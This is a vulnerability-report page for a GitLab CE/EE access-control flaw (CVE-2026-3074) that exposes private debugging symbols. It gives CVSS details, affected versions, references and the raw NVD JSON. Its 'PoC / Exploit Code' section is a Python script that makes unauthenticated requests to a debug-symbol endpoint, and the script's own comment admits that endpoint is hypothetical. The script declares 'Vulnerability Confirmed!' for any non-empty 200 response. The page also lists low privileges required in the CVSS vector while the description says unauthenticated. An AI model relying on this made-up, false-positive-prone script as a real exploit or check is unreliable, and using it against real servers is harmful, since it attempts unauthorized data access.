Security Vulnerability Report
CVE-2026-3074 CVSS 4.3 MEDIUM

Published: 2026-05-14 06:16:22
Last Modified: 2026-05-14 16:20:43

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.7 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an unauthenticated user to download private debugging symbols from inaccessible projects due to improper access control.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No CPE configuration data available. Affected version ranges, taken from the description:

GitLab CE/EE >= 16.7, < 18.9.7
GitLab CE/EE >= 18.10, < 18.10.6
GitLab CE/EE >= 18.11, < 18.11.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def check_poc(target_url, project_id):
    # Construct the endpoint for debug symbols.
    # Note: the exact endpoint path is hypothetical, inferred from the
    # vulnerability description; it is not a confirmed GitLab route.
    endpoint = f"{target_url.rstrip('/')}/-/debug_symbols/{project_id}/download"
    headers = {"User-Agent": "CVE-2026-3074-Scanner"}
    try:
        # Send the request without authentication (as per the description).
        response = requests.get(endpoint, headers=headers, timeout=10)
        if response.status_code == 200:
            # Check whether the content type suggests a binary/symbol file.
            content_type = response.headers.get("Content-Type", "")
            if "application/octet-stream" in content_type or len(response.content) > 0:
                print(f"[+] Vulnerability Confirmed! Downloaded debug symbols for project {project_id}.")
                print(f"[+] Response Size: {len(response.content)} bytes")
                return True
            # 200 but empty body and no binary content type: treat as not confirmed.
            print("[-] Received 200 but the response does not look like a symbol file.")
            return False
        print(f"[-] Exploit failed. Status Code: {response.status_code}")
        return False
    except requests.RequestException as e:
        print(f"[!] Error occurred: {e}")
        return False


if __name__ == "__main__":
    target = "https://gitlab.target.com"  # placeholder host
    pid = "12345"  # Private Project ID (placeholder)
    check_poc(target, pid)

References

Weakness: CWE-639 (Authorization Bypass Through User-Controlled Key)
https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/
https://gitlab.com/gitlab-org/gitlab/-/work_items/591229
https://hackerone.com/reports/3556163

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-3074",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-14T06:16:22.400",
    "lastModified": "2026-05-14T16:20:43.240",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.7 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an unauthenticated user to download private debugging symbols from inaccessible projects due to improper access control."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-639"}
        ]
      }
    ],
    "references": [
      {"url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/", "source": "[email protected]"},
      {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/591229", "source": "[email protected]"},
      {"url": "https://hackerone.com/reports/3556163", "source": "[email protected]"}
    ]
  }
}